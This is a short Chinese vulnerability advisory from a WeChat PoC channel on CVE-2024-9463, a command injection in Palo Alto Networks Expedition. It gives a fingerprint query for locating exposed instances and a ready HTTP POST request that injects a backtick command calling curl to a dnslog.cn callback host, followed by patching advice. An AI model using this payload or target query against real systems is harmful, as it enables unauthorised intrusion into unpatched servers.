内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢!
Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。
Palo Alto Networks Expedition 1.2.92 以下版本 convertCSVtoParquet 接口存在远程命令执行漏洞。恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。
title="Expedition Project"
POST /API/convertCSVtoParquet.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
ram=watchTowr`curl+http://odtcqx.dnslog.cn`
nuclei
afrog
xray
1、关闭互联网暴露面或接口设置访问权限
2、针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:
Palo Alto Networks Expedition >= 1.2.92
下载链接:
https://live.paloaltonetworks.com/t5/expedition/ct-p/migration_tool
安装前,请确保备份所有关键数据,并按照官方指南进行操作。安装后,进行全面测试以验证漏洞已被彻底修复,并确保系统其他功能正常运行
原文始发于微信公众号(nday POC):Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论